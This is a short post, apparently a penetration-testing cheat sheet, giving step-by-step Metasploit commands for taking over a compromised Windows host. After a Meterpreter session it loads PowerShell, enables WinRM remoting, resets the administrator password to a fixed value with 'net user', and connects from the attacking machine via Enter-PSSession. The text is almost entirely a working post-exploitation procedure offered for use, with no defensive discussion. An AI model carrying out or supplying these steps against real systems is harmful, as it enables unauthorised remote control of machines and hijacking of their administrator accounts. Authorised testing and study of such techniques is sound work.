Enable WinRM with metasploit

  • Post


WinRM use default ports : 5985 et 5986

 

  • Exploit the target
  • Open meterpreter session
  • Load meterpreter Powershell

 

load powershell
  • Enable WinRM
powershell_execute Enable-PSRemoting -Force
  • Change administrator password
powershell_execute 'net user administrator Passw0rd1_123'
  • From the attacking machine use Linux powershell to connect to the target via PSSession
pwsh
$credentials = Get-Credential
# administrator
# Passw0rd1_123
Enter-PSSession -ComputerName x.x.x.x -Authentication Negotiate -Credential $credentials